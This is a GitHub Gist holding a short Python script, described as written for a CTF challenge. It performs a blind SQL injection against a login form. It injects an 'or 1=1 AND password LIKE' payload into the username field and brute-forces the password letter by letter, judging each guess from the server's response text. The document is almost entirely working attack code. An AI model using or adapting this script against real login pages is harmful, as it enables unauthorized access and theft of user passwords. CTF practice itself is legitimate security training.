Created
December 11, 2018 16:35
-
-
Save sauloh/b7fde78aeacdb1bc877335035205c8e8 to your computer and use it in GitHub Desktop.
Script made for an specific CTF Challenge - SQL Injection Password BruteForce
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # SQL Injection Password BruteForce for CTF Challenge | |
| # By Hycodex | |
| import requests | |
| import string | |
| # Payload Injection | |
| payload = "'or+1=1 AND password LIKE '{0}%'#" | |
| URL = "http://example.com/login" | |
| data = {"username":"", "password": "admin"} | |
| password = "" | |
| final_pwd = "" | |
| tmp = "" | |
| # Keep trying until find the password | |
| while True: | |
| for letter in string.lowercase: | |
| tmp = password + letter | |
| data['username'] = payload.format(tmp) | |
| r = requests.post(URL, data=data) | |
| if("Invalid password" in r.text): | |
| password += letter | |
| print("New letter found: {0}".format(letter)) | |
| print("Current Password: {0}".format(password)) | |
| break | |
| # No letter added since last iteration | |
| if final_pwd == password: | |
| print("Password Found: {0}".format(final_pwd)) | |
| break | |
| else: | |
| final_pwd = password |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment